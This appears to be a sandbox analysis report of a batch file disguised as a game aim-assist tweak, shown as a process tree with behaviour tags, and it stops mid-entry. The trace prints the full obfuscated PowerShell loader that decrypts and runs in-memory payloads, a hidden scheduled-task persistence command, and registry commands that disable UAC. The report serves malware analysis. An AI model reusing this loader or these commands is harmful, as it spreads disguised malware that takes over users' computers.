PID 3728 wrote to memory of 2012	3728	WScript.exe	88
PID 3728 wrote to memory of 2012	3728	WScript.exe	88
PID 2012 wrote to memory of 3216	2012	cmd.exe	90
PID 2012 wrote to memory of 3216	2012	cmd.exe	90
PID 2012 wrote to memory of 4780	2012	cmd.exe	91
PID 2012 wrote to memory of 4780	2012	cmd.exe	91
PID 4780 wrote to memory of 3528	4780	powershell.exe	57
PID 4780 wrote to memory of 1572	4780	powershell.exe	29
PID 4780 wrote to memory of 3384	4780	powershell.exe	66
PID 4780 wrote to memory of 388	4780	powershell.exe	13
PID 4780 wrote to memory of 2552	4780	powershell.exe	44
PID 4780 wrote to memory of 1960	4780	powershell.exe	35
PID 4780 wrote to memory of 1952	4780	powershell.exe	34
PID 4780 wrote to memory of 2540	4780	powershell.exe	43
PID 4780 wrote to memory of 1552	4780	powershell.exe	28
PID 4780 wrote to memory of 1944	4780	powershell.exe	33
PID 4780 wrote to memory of 2332	4780	powershell.exe	41
PID 4780 wrote to memory of 1148	4780	powershell.exe	19
PID 4780 wrote to memory of 2132	4780	powershell.exe	39
PID 4780 wrote to memory of 3504	4780	powershell.exe	56
PID 4780 wrote to memory of 3108	4780	powershell.exe	74
PID 4780 wrote to memory of 2908	4780	powershell.exe	52
PID 4780 wrote to memory of 968	4780	powershell.exe	12
PID 4780 wrote to memory of 3684	4780	powershell.exe	58
PID 4780 wrote to memory of 3288	4780	powershell.exe	54
PID 4780 wrote to memory of 2696	4780	powershell.exe	46
PID 4780 wrote to memory of 916	4780	powershell.exe	11
PID 4780 wrote to memory of 1304	4780	powershell.exe	25
PID 4780 wrote to memory of 908	4780	powershell.exe	16
PID 4780 wrote to memory of 1296	4780	powershell.exe	24
PID 4780 wrote to memory of 1492	4780	powershell.exe	27
PID 4780 wrote to memory of 1220	4780	powershell.exe	21
PID 4780 wrote to memory of 1476	4780	powershell.exe	26
PID 4780 wrote to memory of 5076	4780	powershell.exe	67
PID 4780 wrote to memory of 404	4780	powershell.exe	14
PID 4780 wrote to memory of 2444	4780	powershell.exe	42
PID 4780 wrote to memory of 1256	4780	powershell.exe	23
PID 4780 wrote to memory of 1588	4780	powershell.exe	70
PID 4780 wrote to memory of 1644	4780	powershell.exe	30
PID 4780 wrote to memory of 2036	4780	powershell.exe	37
PID 4780 wrote to memory of 456	4780	powershell.exe	15
PID 4780 wrote to memory of 1044	4780	powershell.exe	18
PID 4780 wrote to memory of 2760	4780	powershell.exe	92
PID 4780 wrote to memory of 2760	4780	powershell.exe	92
PID 4780 wrote to memory of 2364	4780	powershell.exe	93
PID 4780 wrote to memory of 2364	4780	powershell.exe	93
PID 4780 wrote to memory of 2224	4780	powershell.exe	40
PID 4780 wrote to memory of 1232	4780	powershell.exe	22
PID 4780 wrote to memory of 1820	4780	powershell.exe	32
PID 4780 wrote to memory of 2600	4780	powershell.exe	45
PID 4780 wrote to memory of 2796	4780	powershell.exe	49
PID 4780 wrote to memory of 1808	4780	powershell.exe	31
PID 4780 wrote to memory of 1996	4780	powershell.exe	36
PID 4780 wrote to memory of 808	4780	powershell.exe	10
PID 4780 wrote to memory of 2752	4780	powershell.exe	48
PID 4780 wrote to memory of 1192	4780	powershell.exe	20

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:808
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:236
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
  2⤵
  PID:1188
- - C:\Windows\system32\srtasks.exe
    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
    3⤵
    PID:1800
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:456

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1296
- C:\Users\Admin\AppData\Roaming\SubDir.exe
  "C:\Users\Admin\AppData\Roaming\SubDir.exe"
  2⤵
  - Executes dropped EXE
  PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2332

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3504

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\harder hit shotgun (Aim assist KBM).bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eS2yviRx9g58QXQ5WEY1hxRU1FRFZ+WCQjj4DF8Yo+s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/5M4rF29PLzfzIdCDX3z3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wdzZl=New-Object System.IO.MemoryStream(,$param_var); $tFjeV=New-Object System.IO.MemoryStream; $RZFDj=New-Object System.IO.Compression.GZipStream($wdzZl, [IO.Compression.CompressionMode]::Decompress); $RZFDj.CopyTo($tFjeV); $RZFDj.Dispose(); $wdzZl.Dispose(); $tFjeV.Dispose(); $tFjeV.ToArray();}function execute_function($param_var,$param2_var){ $zHhDr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KmWZv=$zHhDr.EntryPoint; $KmWZv.Invoke($null, $param2_var);}$ApSnB = 'C:\Users\Admin\AppData\Local\Temp\harder hit shotgun (Aim assist KBM).bat';$host.UI.RawUI.WindowTitle = $ApSnB;$IzpHL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ApSnB).Split([Environment]::NewLine);foreach ($TsExN in $IzpHL) { if ($TsExN.StartsWith('LlJoMofbVvIMUoKOulNw')) { $npZNv=$TsExN.Substring(20); break; }}$payloads_var=[string[]]$npZNv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_252_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:524
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eS2yviRx9g58QXQ5WEY1hxRU1FRFZ+WCQjj4DF8Yo+s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/5M4rF29PLzfzIdCDX3z3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wdzZl=New-Object System.IO.MemoryStream(,$param_var); $tFjeV=New-Object System.IO.MemoryStream; $RZFDj=New-Object System.IO.Compression.GZipStream($wdzZl, [IO.Compression.CompressionMode]::Decompress); $RZFDj.CopyTo($tFjeV); $RZFDj.Dispose(); $wdzZl.Dispose(); $tFjeV.Dispose(); $tFjeV.ToArray();}function execute_function($param_var,$param2_var){ $zHhDr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KmWZv=$zHhDr.EntryPoint; $KmWZv.Invoke($null, $param2_var);}$ApSnB = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.bat';$host.UI.RawUI.WindowTitle = $ApSnB;$IzpHL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ApSnB).Split([Environment]::NewLine);foreach ($TsExN in $IzpHL) { if ($TsExN.StartsWith('LlJoMofbVvIMUoKOulNw')) { $npZNv=$TsExN.Substring(20); break; }}$payloads_var=[string[]]$npZNv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        6⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\harder hit shotgun.bat" "
        7⤵
        
        PID:2760
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        8⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
        8⤵
        UAC bypass
        
        PID:4900
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
        8⤵
        
        PID:3748
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        8⤵
        
        PID:3652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
        8⤵
        
        PID:524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Risxn Restore Point'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v "CpuPriorityClass" /t REG_DWORD /d "3" /f
        8⤵
        Event Triggered Execution: Image File Execution Options Injection
        
        PID:2784
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v "IoPriority" /t REG_DWORD /d "3" /f
        8⤵
        Event Triggered Execution: Image File Execution Options Injection
        
        PID:4332
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DelayedAckFrequency" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DelayedAckTicks" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "CongestionAlgorithm" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2964
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MultihopSets" /t REG_DWORD /d "15" /f
        8⤵
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "FastCopyReceiveThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:4860
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "FastSendDatagramThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:2200
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DefaultReceiveWindow" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:4744
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DefaultSendWindow" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:4500
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "FastCopyReceiveThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:4456
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "FastSendDatagramThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DynamicSendBufferDisable" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:116
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "IgnorePushBitOnReceives" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "NonBlockingSendSpecialBuffering" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:700
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DisableRawSecurity" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3340
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2184
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4980
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Update" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2428
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\Update" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\Update\ExcludeWUDriversInQualityUpdate" /v "value" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3480
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2032
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1392
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4972
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
        8⤵
        UAC bypass
        
        PID:3132
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
        8⤵
        UAC bypass
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
        8⤵
        UAC bypass
        
        PID:4496
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
        8⤵
        UAC bypass
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableAutomaticRestartSignOn" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:772
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance" /v "MaintenanceDisabled" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4240
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsConsumerFeatures" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1076
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2516
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerThrottling" /v "PowerThrottlingOff" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4852
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f
        8⤵
        
        PID:3724
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f
        8⤵
        
        PID:732
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f
        8⤵
        
        PID:960
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "4294967295" /f
        8⤵
        
        PID:3360
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "Affinity" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "Background Only" /t REG_SZ /d "False" /f
        8⤵
        
        PID:4060
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "Clock Rate" /t REG_DWORD /d "10000" /f
        8⤵
        
        PID:3700
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "GPU Priority" /t REG_DWORD /d "8" /f
        8⤵
        
        PID:4884
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "Priority" /t REG_DWORD /d "6" /f
        8⤵
        
        PID:3776
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "Scheduling Category" /t REG_SZ /d "High" /f
        8⤵
        
        PID:4032
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile\Tasks\Games" /v "SFIO Priority" /t REG_SZ /d "High" /f
        8⤵
        
        PID:2740
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1400
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3712
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:4364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3296
        
        C:\Windows\system32\reg.exe
        
